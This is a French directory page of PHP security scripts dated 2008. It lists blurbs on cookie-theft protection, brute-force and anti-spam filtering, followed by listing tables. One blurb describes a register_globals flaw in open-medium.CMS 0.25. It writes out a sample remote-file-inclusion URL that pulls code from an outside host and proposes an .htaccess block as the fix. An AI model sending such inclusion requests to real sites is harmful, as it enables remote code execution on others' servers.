09 Juin 2008
Connexion + sécurité contre le vol de cookies + bruteforce
Compatibilité : PHP 5, PHP 7, PHP 8
Le but de cette classe est de protéger vos utilisateurs du vol de cookie online, en introduisant leur IP publique dans le hash du cookie.
Le script se trouve peut-être sur votre site géré par open-medium.CMS en version 0.25.
La faille touche les sites dont le paramètre register_globals est à on.
Une petite règle dans le fichier .htaccess permet de renvoyer un code retour 403. Les url concernées sont de la forme : http://www.example.com/404.php?REDSYS[MYPATH][TEMPLATES]=http://sitepourri.com/page.txt?
|
Le but de cette classe est de protéger vos utilisateurs du vol de cookie online, en introduisant leur IP publique dans le hash du cookie.
On sait que les robots pollue le web avec le spam en alimentant de manière automatique les formulaires de contacts par exemple.
Vous en avez marre de voir vos formulaires rempli de Javascript - Ce code va empêcher plusieurs formes de hack JS.
Il faut installer un script zippé au préalable puis remplacer la fonction controle_ip() par celle que nous vous donnons.
Tag Cloud Mysqli - Actualisé pour passer sur tous les sites web. Démo en ligne disponible. Explication du code. Support.
| Langue | |
| Date | aujourd'hui |
| Taille | 19 Mo |
| Catégorie | CMS |
| Langue | |
| Date | hier |
| Taille | 149 Mo |
| Catégorie | Administration |
| Langue | |
| Date | hier |
| Taille | 16 Mo |
| Catégorie | Ecommerce |
| Langue | |
| Date | 22 Fév 2026 |
| Taille | 177 Mo |
| Catégorie | CMS |
| Langue | |
| Date | 20 Fév 2026 |
| Taille | 28 Mo |
| Catégorie | Divers |
| Langue | |
| Date | 20 Fév 2026 |
| Taille | 11 Mo |
| Catégorie | Divers |